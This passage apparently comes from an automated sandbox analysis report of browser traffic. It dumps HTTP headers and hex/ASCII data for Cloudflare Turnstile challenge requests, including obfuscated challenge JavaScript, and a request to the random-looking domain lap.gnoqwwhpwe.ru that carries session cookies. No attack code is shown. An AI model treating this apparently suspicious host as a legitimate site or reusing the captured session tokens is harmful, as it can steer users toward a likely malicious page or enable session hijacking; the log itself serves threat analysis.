                                                                                      2025-01-09 04:11:00 UTC1369INData Raw: 31 30 29 5d 28 30 2c 4c 29 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4d 3d 64 5b 68 30 28 31 33 34 38 29 5d 28 65 2c 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 27 27 7d 66 6f 72 28 45 3d 73 5b 33 5d 3d 4d 2c 44 5b 68 30 28 31 32 38 37 29 5d 28 4d 29 3b 3b 29 7b 69 66 28 49 3e 69 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 30 28 31 33 33 37 29 5d 28 32 2c 43 29 2c 46 3d 31 3b 64 5b 68 30 28 31 31 39 32 29 5d 28 46 2c 4b 29 3b 4c 3d 64 5b 68 30 28 31 33 30 33 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 64 5b 68 30 28 33 34 30 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 68 30 28 38 39 31 29 5d 28 64 5b 68 30 28 38 39 34 29 5d 28 30 2c 4c 29 3f 31 3a 30 2c 46
                                                                                      Data Ascii: 10)](0,L)?1:0)*F,F<<=1);M=d[h0(1348)](e,J);break;case 2:return''}for(E=s[3]=M,D[h0(1287)](M);;){if(I>i)return'';for(J=0,K=Math[h0(1337)](2,C),F=1;d[h0(1192)](F,K);L=d[h0(1303)](G,H),H>>=1,d[h0(340)](0,H)&&(H=j,G=o(I++)),J|=d[h0(891)](d[h0(894)](0,L)?1:0,F
                                                                                      2025-01-09 04:11:00 UTC1369INData Raw: 7b 69 66 28 69 35 3d 67 4a 2c 6f 3d 7b 27 4a 79 64 46 76 27 3a 69 35 28 31 34 35 35 29 2c 27 73 4d 66 66 69 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 5e 48 7d 2c 27 64 7a 43 7a 58 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 48 5e 47 7d 2c 27 4a 54 57 4e 73 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 5e 48 7d 2c 27 50 66 44 77 48 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 73 6e 53 73 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 5e 48 7d 2c 27 6f 56 54 42 47 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 26 48 7d 2c 27 54 65 58 49 58 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29
                                                                                      Data Ascii: {if(i5=gJ,o={'JydFv':i5(1455),'sMffi':function(G,H){return G^H},'dzCzX':function(G,H){return H^G},'JTWNs':function(G,H){return G^H},'PfDwH':function(G,H){return G+H},'snSsZ':function(G,H){return G^H},'oVTBG':function(G,H){return G&H},'TeXIX':function(G,H)
                                                                                      2025-01-09 04:11:00 UTC1369INData Raw: 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 31 34 2e 39 33 5d 5b 31 5d 5b 69 37 28 31 35 31 34 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 31 34 2e 35 38 5d 5b 30 5d 2b 2b 29 2d 31 39 30 2c 32 35 36 29 26 32 35 35 5e 31 30 32 5e 74 68 69 73 2e 67 5d 2c 4d 3d 6f 5b 69 37 28 31 35 34 37 29 5d 28 74 68 69 73 2e 68 5b 6f 5b 69 37 28 31 30 37 36 29 5d 28 31 31 34 2c 74 68 69 73 2e 67 29 5d 5b 33 5d 5e 6f 5b 69 37 28 31 34 39 39 29 5d 28 6f 5b 69 37 28 38 35 38 29 5d 28 6f 5b 69 37 28 35 34 30 29 5d 28 74 68 69 73 2e 68 5b 31 31 34 5e 74 68 69 73 2e 67 5d 5b 31 5d 5b 69 37 28 31 35 31 34 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 31 34 2e 36 32 5d 5b 30 5d 2b 2b 29 2c 31 39 30 29 2c 32 35 36 29 2c 32 35 35 29 2c 31 35 32 29 2c 4e 3d 5b 5d 2c
                                                                                      Data Ascii: his.h[this.g^114.93][1][i7(1514)](this.h[this.g^114.58][0]++)-190,256)&255^102^this.g],M=o[i7(1547)](this.h[o[i7(1076)](114,this.g)][3]^o[i7(1499)](o[i7(858)](o[i7(540)](this.h[114^this.g][1][i7(1514)](this.h[this.g^114.62][0]++),190),256),255),152),N=[],
                                                                                      2025-01-09 04:11:00 UTC1369INData Raw: 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 3d 3d 6e 7d 2c 27 79 54 79 69 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 28 6f 29 7d 2c 27 65 54 45 49 61 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 2b 6f 7d 7d 2c 6a 3d 4f 62 6a 65 63 74 5b 69 38 28 31 31 37 37 29 5d 28 68 29 2c 6b 3d 30 3b 6b 3c 6a 5b 69 38 28 36 37 34 29 5d 3b 6b 2b 2b 29 69 66 28 6c 3d 6a 5b 6b 5d 2c 6c 3d 3d 3d 27 66 27 26 26 28 6c 3d 27 4e 27 29 2c 67 5b 6c 5d 29 7b 66 6f 72 28 6d 3d 30 3b 6d 3c 68 5b 6a 5b 6b 5d 5d 5b 69 38 28 36 37 34 29 5d 3b 69 5b 69 38 28 36 31 32 29 5d 28 2d 31 2c 67 5b 6c 5d 5b 69 38 28 32 33 34 29 5d 28 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 29 26 26 28 69 5b 69 38 28 34 37 37 29 5d 28 66 42 2c 68 5b 6a 5b 6b 5d 5d 5b
                                                                                      Data Ascii: o){return o===n},'yTyiM':function(n,o){return n(o)},'eTEIa':function(n,o){return n+o}},j=Object[i8(1177)](h),k=0;k<j[i8(674)];k++)if(l=j[k],l==='f'&&(l='N'),g[l]){for(m=0;m<h[j[k]][i8(674)];i[i8(612)](-1,g[l][i8(234)](h[j[k]][m]))&&(i[i8(477)](fB,h[j[k]][


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      10192.168.2.1649722104.18.95.414437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:10:59 UTC739OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: image
                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/vjglw/0x4AAAAAAA0rfpQOBx227C7S/auto/fbE/normal/auto/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:11:00 UTC240INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 04:11:00 GMT
                                                                                      Content-Type: image/png
                                                                                      Content-Length: 61
                                                                                      Connection: close
                                                                                      cache-control: max-age=2629800, public
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ff194ad8ac880d0-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2025-01-09 04:11:00 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                      Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      11192.168.2.1649709188.114.96.34437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:11:00 UTC1318OUTGET /favicon.ico HTTP/1.1
                                                                                      Host: lap.gnoqwwhpwe.ru
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: image
                                                                                      Referer: https://lap.gnoqwwhpwe.ru/3aeK/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IjE4R2lacS9tVllvMEhpUUtKbDQ2TUE9PSIsInZhbHVlIjoiRXU4Ri80dEhJSWxyRTh6VWZFckNubFhJY3h4bnJpLzRqU2Vac1hSeEE1aDVzUFhxQkJXRytlbkxoZzJaQ3FYNmYrYzFhTG5SZkdhSWY5WENQL3IwVzluY3BWUDFFZXE4bnpHSXRaZ3dXTGgwa2pzRlNVbmJDSHNnUHhhSmhPZnciLCJtYWMiOiJhZWQ4ODRiNDNhZmI3MmVjZjk0YTdkNDY1M2MzNzgzNzk2MDQxZTU1NjJlNDM2MmZjZmM4MWNhODFlYWMxZDRmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImtCb003VmlnZWhsK2JTWmdPSWphU3c9PSIsInZhbHVlIjoiSkZGRmVqSEQxbVlrMjhLc1lEbHJadEtGc282MkRQWG9ORGI3dkNiaFVlT2lrSUpIYlVmREIrOTcxalUzZFJZaDIyNG1qUFFQRmFMenFXeTg2Nk9XTWp2UHdRQXVDeTZRMG5seTRjZmNDWWtOQ3hwZGQxVGhIYVZvS3Q0bDFzcmkiLCJtYWMiOiI1ZWFiMzkxOTkwN2VjNGZlMTM3NTE3YmFkMTZiNmFmZTE2MGFmNjVmYTRmODdjMWEyYTQ0YTBjNTdkOWRkOWRjIiwidGFnIjoiIn0%3D
                                                                                      2025-01-09 04:11:00 UTC1056INHTTP/1.1 404 Not Found
                                                                                      Date: Thu, 09 Jan 2025 04:11:00 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=14400
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oqxao9qQCC6II3KSlsZF6aku7OXU7mAi7dckWx91GM1OzUBm%2BxhhaPQi1WEK5sfBwduW0IdgDScmXau4zMP3rcOKzsn0L4GT9p6MF7DOc7FbimndZWzzcruaKpB%2B6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Vary: Accept-Encoding
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=5535&min_rtt=5509&rtt_var=1600&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2233&delivery_rate=501850&cwnd=251&unsent_bytes=0&cid=ca71fd36856065f1&ts=144&x=0"
                                                                                      CF-Cache-Status: MISS
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ff194af5d4f5e7d-EWR
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1641&rtt_var=629&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1896&delivery_rate=1720683&cwnd=227&unsent_bytes=0&cid=2772cc9b4db0ab70&ts=3880&x=0"
                                                                                      2025-01-09 04:11:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      12192.168.2.1649724104.18.95.414437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:11:00 UTC385OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:11:00 UTC240INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 04:11:00 GMT
                                                                                      Content-Type: image/png
                                                                                      Content-Length: 61
                                                                                      Connection: close
                                                                                      cache-control: max-age=2629800, public
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ff194b14dbac470-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2025-01-09 04:11:00 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                      Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      13192.168.2.1649726104.18.95.414437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:11:00 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ff194a8eb4842ec&lang=auto HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:11:00 UTC331INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 04:11:00 GMT
                                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                                      Content-Length: 120267
                                                                                      Connection: close
                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ff194b24e89de96-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2025-01-09 04:11:00 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70
                                                                                      Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcep
                                                                                      2025-01-09 04:11:00 UTC1369INData Raw: 22 54 65 72 6d 73 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 22 3a 22 48 61 76 69 6e 67 25 32 30 74 72 6f 75 62 6c 65 25 33 46 22 2c 22 63 68 65 63 6b 5f 64 65 6c 61 79 73 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32
                                                                                      Data Ascii: "Terms","turnstile_feedback_report":"Having%20trouble%3F","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%2
                                                                                      2025-01-09 04:11:00 UTC1369INData Raw: 67 69 2c 67 6d 2c 67 74 2c 67 78 2c 67 79 2c 67 43 2c 67 44 2c 67 48 2c 65 50 2c 65 51 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 30 36 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 37 32 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 35 31 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 67 49 28 38 37 37 29 29 2f 34 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 34 30 32 29 29 2f 35 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 39 36 29 29 2f 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 32 32 29 29 2f 37 29 2b 2d 70 61 72 73 65 49 6e 74 28
                                                                                      Data Ascii: gi,gm,gt,gx,gy,gC,gD,gH,eP,eQ){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1206))/1*(-parseInt(gI(1572))/2)+-parseInt(gI(851))/3+parseInt(gI(877))/4*(-parseInt(gI(402))/5)+parseInt(gI(1096))/6*(-parseInt(gI(1522))/7)+-parseInt(
                                                                                      2025-01-09 04:11:00 UTC1369INData Raw: 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 54 74 70 75 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 48 42 42 71 55 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 54 53 64 64 42 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 75 6c 4f 59 61 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 4d 79 4d 41 45 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 71 76 71 44 76 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 71 41 4c 57 49 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d
                                                                                      Data Ascii: ){return h==i},'Ttpul':function(h,i){return i!=h},'HBBqU':function(h,i){return h&i},'TSddB':function(h,i){return h&i},'ulOYa':function(h,i){return h(i)},'MyMAE':function(h,i){return h*i},'qvqDv':function(h,i){return h<i},'qALWI':function(h,i){return i==h}
                                                                                      2025-01-09 04:11:00 UTC1369INData Raw: 28 38 32 31 29 5d 5b 67 4f 28 32 38 38 29 5d 28 78 2c 4c 29 29 43 3d 4c 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 67 4f 28 31 31 39 33 29 5d 5b 67 4f 28 38 32 31 29 5d 5b 67 4f 28 32 38 38 29 5d 28 42 2c 43 29 29 7b 69 66 28 67 4f 28 31 34 39 34 29 3d 3d 3d 67 4f 28 31 34 39 34 29 29 7b 69 66 28 32 35 36 3e 43 5b 67 4f 28 36 39 30 29 5d 28 30 29 29 7b 66 6f 72 28 73 3d 30 3b 64 5b 67 4f 28 31 32 35 36 29 5d 28 73 2c 46 29 3b 48 3c 3c 3d 31 2c 49 3d 3d 64 5b 67 4f 28 31 31 30 30 29 5d 28 6a 2c 31 29 3f 28 49 3d 30 2c 47 5b 67 4f 28 33 37 31 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 67 4f 28 36 39 30 29 5d 28 30 29 2c 73 3d 30 3b 38 3e 73 3b 48 3d 64 5b 67 4f 28 31 34 31 32 29 5d 28 48 2c 31 29 7c 4d
                                                                                      Data Ascii: (821)][gO(288)](x,L))C=L;else{if(Object[gO(1193)][gO(821)][gO(288)](B,C)){if(gO(1494)===gO(1494)){if(256>C[gO(690)](0)){for(s=0;d[gO(1256)](s,F);H<<=1,I==d[gO(1100)](j,1)?(I=0,G[gO(371)](o(H)),H=0):I++,s++);for(M=C[gO(690)](0),s=0;8>s;H=d[gO(1412)](H,1)|M
                                                                                      2025-01-09 04:11:00 UTC1369INData Raw: 32 34 34 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 64 65 6c 65 74 65 20 42 5b 43 5d 7d 65 6c 73 65 20 66 6f 72 28 4d 3d 78 5b 43 5d 2c 73 3d 30 3b 73 3c 46 3b 48 3d 64 5b 67 4f 28 34 37 31 29 5d 28 64 5b 67 4f 28 38 32 37 29 5d 28 48 2c 31 29 2c 4d 26 31 29 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 67 4f 28 33 37 31 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 44 2d 2d 2c 64 5b 67 4f 28 31 35 36 31 29 5d 28 30 2c 44 29 26 26 46 2b 2b 7d 7d 66 6f 72 28 4d 3d 32 2c 73 3d 30 3b 73 3c 46 3b 48 3d 48 3c 3c 31 7c 31 26 4d 2c 64 5b 67 4f 28 31 35 36 31 29 5d 28 49 2c 64 5b 67 4f 28 31 30 31 34 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 67 4f 28 33 37 31 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e
                                                                                      Data Ascii: 244)](2,F),F++),delete B[C]}else for(M=x[C],s=0;s<F;H=d[gO(471)](d[gO(827)](H,1),M&1),j-1==I?(I=0,G[gO(371)](o(H)),H=0):I++,M>>=1,s++);D--,d[gO(1561)](0,D)&&F++}}for(M=2,s=0;s<F;H=H<<1|1&M,d[gO(1561)](I,d[gO(1014)](j,1))?(I=0,G[gO(371)](o(H)),H=0):I++,M>>
                                                                                      2025-01-09 04:11:00 UTC1369INData Raw: 31 29 5d 28 4d 29 3b 3b 29 7b 69 66 28 64 5b 67 52 28 33 35 37 29 5d 28 49 2c 69 29 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 67 52 28 32 34 34 29 5d 28 32 2c 43 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4c 3d 64 5b 67 52 28 36 30 33 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 64 5b 67 52 28 35 38 39 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 67 52 28 33 33 32 29 5d 28 64 5b 67 52 28 31 32 31 35 29 5d 28 30 2c 4c 29 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 4d 3d 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 67 52 28 32 34 34 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4c 3d 64 5b 67 52 28 37 36 35 29 5d 28 47 2c 48 29 2c 48 3e 3e
                                                                                      Data Ascii: 1)](M);;){if(d[gR(357)](I,i))return'';for(J=0,K=Math[gR(244)](2,C),F=1;K!=F;L=d[gR(603)](G,H),H>>=1,H==0&&(H=j,G=d[gR(589)](o,I++)),J|=d[gR(332)](d[gR(1215)](0,L)?1:0,F),F<<=1);switch(M=J){case 0:for(J=0,K=Math[gR(244)](2,8),F=1;K!=F;L=d[gR(765)](G,H),H>>
                                                                                      2025-01-09 04:11:00 UTC1369INData Raw: 4d 5b 68 75 28 31 33 33 33 29 5d 5b 68 75 28 38 32 33 29 5d 7d 2c 27 2a 27 29 29 7d 2c 67 29 7d 2c 65 4d 5b 67 4a 28 31 33 31 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 2c 68 76 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 29 7b 69 3d 28 68 76 3d 67 4a 2c 7b 27 71 6e 4d 7a 69 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 2c 47 29 7b 72 65 74 75 72 6e 20 45 28 46 2c 47 29 7d 2c 27 45 44 74 4b 62 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 20 69 6e 73 74 61 6e 63 65 6f 66 20 46 7d 2c 27 51 67 42 6d 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 7c 7c 46 7d 2c 27 55 79 77 58 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 2b 46 7d 2c 27 42 6c
                                                                                      Data Ascii: M[hu(1333)][hu(823)]},'*'))},g)},eM[gJ(1317)]=function(f,g,h,hv,i,j,k,l,m,n,o,s,x,B,C,D){i=(hv=gJ,{'qnMzi':function(E,F,G){return E(F,G)},'EDtKb':function(E,F){return E instanceof F},'QgBmM':function(E,F){return E||F},'UywXN':function(E,F){return E+F},'Bl
